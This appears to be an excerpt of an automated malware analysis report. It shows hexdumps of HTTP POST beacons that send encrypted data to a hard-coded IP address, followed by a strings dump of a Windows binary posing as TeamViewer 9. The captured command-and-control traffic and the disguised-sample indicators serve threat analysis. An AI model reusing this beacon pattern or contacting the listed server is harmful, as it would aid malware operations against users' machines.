0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000090 (00144)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000a0 (00160)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000b0 (00176)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000c0 (00192)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x000000d0 (00208)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000e0 (00224)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000f0 (00240)   5220322e 302e3530 37323729 0d0a5072   R 2.0.50727)..Pr
0x00000100 (00256)   61676d61 3a206e6f 2d636163 68650d0a   agma: no-cache..
0x00000110 (00272)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000120 (00288)   6f2d6361 6368650d 0a436f6e 6e656374   o-cache..Connect
0x00000130 (00304)   696f6e3a 20636c6f 73650d0a 0d0a6669   ion: close....fi
0x00000140 (00320)   6c656e61 6d653d77 6e68742e 6a647326   lename=wnht.jds&
0x00000150 (00336)   64617461 3dbd4837 9907330b a4c97591   data=.H7..3...u.
0x00000160 (00352)   8a9d33ae d3e6532c ece91820 c6bdee85   ..3...S,... ....
0x00000170 (00368)   6347adce 6061b68d 4301ebf0 87240b73   cG..`a..C....$.s
0x00000180 (00384)   4abd559c 4224c52d 27380c63 d7ae8c68   J.U.B$.-'8.c...h
0x00000190 (00400)   c69f5d93 a4190960 7adeb1a3 d7526d5d   ..]....`z....Rm]
0x000001a0 (00416)   4ad41bc6 5a58f7f2 cdfc788c c0e2b16c   J...ZX....x....l
0x000001b0 (00432)   03959470 af70f05b 161cf5b1 73664b16   ...p.p.[....sfK.
0x000001c0 (00448)   fec550e2                              ..P.

0x00000000 (00000)   504f5354 202f3834 3333392f 6b693668   POST /84339/ki6h
0x00000010 (00016)   706a386d 63642f69 6e646578 2e706870   pj8mcd/index.php
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   20313738 2e323032 2e323332 2e323031    178.202.232.201
0x00000040 (00064)   3a333338 31360d0a 436f6e74 656e742d   :33816..Content-
0x00000050 (00080)   4c656e67 74683a20 3133330d 0a416363   Length: 133..Acc
0x00000060 (00096)   6570742d 456e636f 64696e67 3a206465   ept-Encoding: de
0x00000070 (00112)   666c6174 650d0a43 6f6e7465 6e742d54   flate..Content-T
0x00000080 (00128)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000090 (00144)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x000000a0 (00160)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000b0 (00176)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000c0 (00192)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000d0 (00208)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000e0 (00224)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000f0 (00240)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000100 (00256)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x00000110 (00272)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x00000120 (00288)   3a206e6f 2d636163 68650d0a 436f6e6e   : no-cache..Conn
0x00000130 (00304)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000140 (00320)   0a66696c 656e616d 653d6367 68732e6c   .filename=cghs.l
0x00000150 (00336)   70622664 6174613d cace2869 84112667   pb&data=..(i..&g
0x00000160 (00352)   6a982627 862461c6 69777ead c50ef9ad   j.&'.$a.iw~.....
0x00000170 (00368)   17513c5d 9e93f963 e8a437f0 99579f64   .Q<]...c..7..W.d
0x00000180 (00384)   d455988e f7dbe6b2 f34cf098 7f032b53   .U.......L....+S
0x00000190 (00400)   6c8203fe eb35ea01 087747f0 ac5230eb   l....5...wG..R0.
0x000001a0 (00416)   eea52cfd 5c36cb74 48514b04 a1fd3294   ..,.\6.tHQK...2.
0x000001b0 (00432)   fdbaa8f1 02fa3b75 967da962 1240691b   ......;u.}.b.@i.
0x000001c0 (00448)   92f7a0f7 8ccd                         ......


Strings
zggo
BG\5
..
..
.P
J.
H/.
&...'
1H...K
F2l
...4
.
.&
.)+

041904b0
4, 1, 0, 0
CompanyName
FileDescription
FileVersion
InternalName
LegalCopyright
ny_turgerer
OriginalFilename
ProductName
ProductVersion
StringFileInfo
TeamViewer
TeamViewer 9
TeamViewer GmbH
Translation
tv_w32.exe
VarFileInfo
VS_VERSION_INFO
Zone Labs, LLC
` 0CHJO
1>KeAO]
1ua\K^
2	0=uP
>/2'2t=
~25h+}
29R:Ahdhh
%2ER(y!
2hB>2)
2MUMHY
2@W?A@
345AGHI
3 \9Yh
$3 R*^
3u~7	h
_4c#5B#
4DJ$E+h
}_5BIWT3
<68"S~h
$`"6a@
6=?h,--
6<=Y788
7J>YS~
@8hTYc
-:$#9:
9A(LlT
9`B~Rf
9:KpEC
}9"]Lu
9@}s k
9UFa+:
!9@V:P
A1)bTV
`.adata
AdjustWindowRectEx
A|ElP%V
)a[hF{
AppendMenuA
_assert
atexit
A*uHv&H
`a%`Wl
AwWNb@
AXT)E^_[_)
a	Y0h&
,<%=/b
"*_@-B
BEF3<=<
BeginPaint
_beginthread
_beginthreadex
BF.,iW
BitBlt
bsearch
B@sMEt 
BY@wWp
CallNextHookEx
calloc
CallWindowProcA
_cexit
CharNextA
CharUpperA
CheckMenuItem
_clearfp
ClientToScreen
_close
CloseHandle
CoInitialize
CompareStringA
CompareStringW
CopyRect
}C"o.u
cq]@P\
-CqXE{A
CreateBitmap
CreateCompatibleDC
CreateDialogIndirectParamA
CreateDIBitmap
CreateFileA
CreateSolidBrush
CreateWindowExA
D:\9ea7ld59\lo3v.pdb
@.data
DefDlgProcA
DefWindowProcA
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DestroyMenu
DestroyWindow
DispatchMessageA
D}:P!L&;
Dpq`^	:
DrawFocusRect
DrawIcon
DrawTextA
DuplicateHandle
>D]Za`q
E0c4X+
Ea[Ga!
$eDp5l
eE]I0]
%EEZ^!q
E.j9hP
E-J}K{
EM*"L5h
EnableMenuItem
EnableWindow
EndDialog
EndPaint
_endthread
_endthreadex
EnterCriticalSection
eOQVW6
e%p1|W
_errno
*ER:v-
Escape
&E*TE`	
Ev[vXh
ExcludeUpdateRgn
ExitProcess
ExtTextOutA
fclose
	`FE(/ah
fflush
#f!hta4d4
_filelengthi64
FileTimeToLocalFileTime
FileTimeToSystemTime
FindAtomW
FindClose
FindFirstFileA
FindResourceA
FindWindowA
_flushall
FlushFileBuffers
fprintf
~FPS*E
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
fsetpos
_fstati64
(fWh_mE
fwrite
f&#XEE(uU
~>];Gb
G}C3z+V
GDI32.dll
gdm+47
GetACP
GetActiveWindow
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
_getdrive
GetDriveTypeA
getenv
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
__getmainargs
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetNextDlgTabItem
GetObjectA
GetOEMCP
_get_osfhandle
GetParent
GetProcAddress
GetProcessVersion
GetProfileStringA
GetPropA
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetTextExtentPointA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetVersion
GetVersionExA
GetVolumeInformationA
GetWindow
GetWindowDC
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
}G$(h= 
G*hcAj
ghy]/9
GJK=vww
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
gmtime
GrayStringA
&(G._v
GY[7krO
?H76E}R
~H9E &ER[
H9_[	qn'T
hAF1\i
?hah	x
hbD+u&
hbR[9R
%h$C!\
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
h*Fa0\>
hHE	nh
,&hh>n
h]HPRa
hhWe2,
hhwul2
HideCaret
}h@Kq[h
}hq3ih
H+rkZv
Hv~hrRYUTWl!=
]hZ$5W
:hzhmUh
h\Zw,t('
I'0"{S
i7uHhc
IE`12!
~Ih _G
I\,-h`ue
I~{NDABCA_M
InflateRect
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IntersectClipRect
IntersectRect
InvalidateRect
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
_isctype
IsDialogMessageA
"i?Sf_U8
IsIconic
IsWindow
IsWindowEnabled
IsWindowUnicode
IsWindowVisible
~=`<^j
+/@$j!
j&39r8
jA"jYh
jAug P
.j`_&E
j/hL:@
j)N\/-
&JpFSr
j}w[W?
##k8Q]
KB)yRX
KERNEL32.dll
kh\ E5
";kM_N
kp9pPE
L<3m@%
l6PA1[
L'Be!11>iI
L=@c#1
LCMapStringA
LCMapStringW
ld~zHJ
LeaveCriticalSection
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
localeconv
LocalFree
LocalReAlloc
localtime
LockFile
LockResource
longjmp
lqcuWCOC
_lseeki64
lShVoBD
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
LVd^TOGTpTJ),<2,2
 ( !M0p
-M1"AGhx
malloc
MapWindowPoints
__mb_cur_max
mbstowcs
M@CpmH
memchr
memcmp
memcpy
memmove
memset
MessageBoxA
MIrMt&$
	M_I)uR~A
mktime
mlVh@Yq
ModifyMenuA
mRhjyVM
msvcrt.dll
MulDiv
MultiByteToWideChar
Mxh*on
?mxu<5M
!N0FGV
njO"p'
NNB],T
NR[bI2
NS1 1[
(!o1QA
OffsetRect
OffsetViewportOrgEx
ole32.dll
_@O?%m
_onexit
_open_osfhandle
P8>5e5)D4
Pa2U)g
PatBlt
_pctype
P_|%^+d
PeekMessageA
PEj2YQH
__p__environ
__p__fmode
`p{h$h
P@IQ9X
pKx[SH
pl1.S3
PostMessageA
PostQuitMessage
printf
PsL+Q<
PtInRect
PtVisible
=pz'MC
}QAjaG
qb5MaE
Q/CgsF
Qe;WDd
qh}KM3
<Qjird
Q@quuZ"
quuH!Xz
$qVV^0W 
*!R9#9 
r@aH&\
RaiseException
ReadFile
realloc
RectVisible
RegisterClassA
RegisterWindowMessageA
ReleaseDC
remove
RemovePropA
rename
RestoreDC
rhHURw
RJa_<$"
[RnQV*
_{Rp<SEX
RSDSC6
RtlUnwind
 .RVh?
S3ZUA!
SaveDC
"S"b,,
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
SelectObject
SendDlgItemMessageA
SendMessageA
SetActiveWindow
__set_app_type
SetBkColor
SetBkMode
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
_setjmp
SetLastError
setlocale
SetMapMode
SetMenuItemBitmaps
_setmode
SetPropA
SetStdHandle
SetTextColor
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowsHookExA
SetWindowTextA
ShowCaret
ShowWindow
'SIB2o)
signal
Slgh"h+
_snprintf
s;ou+h
sprintf
sQ7U-*R
sscanf
_stati64
strcat
strcmp
strcpy
_strdup
strerror
_stricmp
strlen
strncmp
strncpy
_strnicmp
strrchr
strstr
strtok
strtol
strtoul
system
SystemParametersInfoA
*(&T`@
T>8d%9
TabbedTextOutA
TerminateProcess
TextOutA
?tEY)Yq
TFD=a~
TH0$4e+)
T@@h]F
!This program cannot be run in DOS mode.
_timezone
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tolower
toupper
!tO*Z,i
>tPM,}
TranslateMessage
_tzname
_tzset
U}9pj@
uA5='\
}uA`mV
<#ud[\
uE6-1S G
ue>Hf1
uh`PH	
uj.Nha
}u Lfu
_umask
UMphSt
U`mS&g8
UnhandledExceptionFilter
UnhookWindowsHookEx
UnlockFile
UnregisterClassA
U'oLar
UpdateWindow
[uPE%4
uSE:}r
USER32.dll
U}ToMGQ!
ux^YJK1T
V6AP[EKx
ValidateRect
	'[V"C12\_S
VC&G50
V}dcYpPD(
vfprintf
Vh ?hXNwh!
v%hVjt
VirtualFree
VirtualProtect
/VjwUa
v,np8=`
?VR!Q@>O
_vsnprintf
W1(PE3
_waccess
_wchmod
wcschr
wcscmp
wcscpy
_wcsdup
wcslen
wcsncmp
wcsncpy
wcsrchr
wcstombs
@wd^T@MUGr^*-"6
_wfopen
_wgetenv
W;H<J>
W}h>xv
WideCharToMultiByte
WIKE$~2L/
WinHelpA
_wopen
_write
WriteFile
_wrmdir
<wR}sP
$w(S~h
wsprintfA
_wstat
_W}u{'
_wunlink
X1S@D 
x=6%I:
XC,$S6z
Xe1YW_
_xf9}}F
X]G m:
Xh[74\]B,
xLHw>9
X.:~Mf
/"xPMRPD
Xs9[KE)h
X@W	 [
^)y5" 
@YBWju1
YgRahP
YJ,'= 5
Y&jgE)
YpQpgZ
ZLWQ)g
Z+-nwm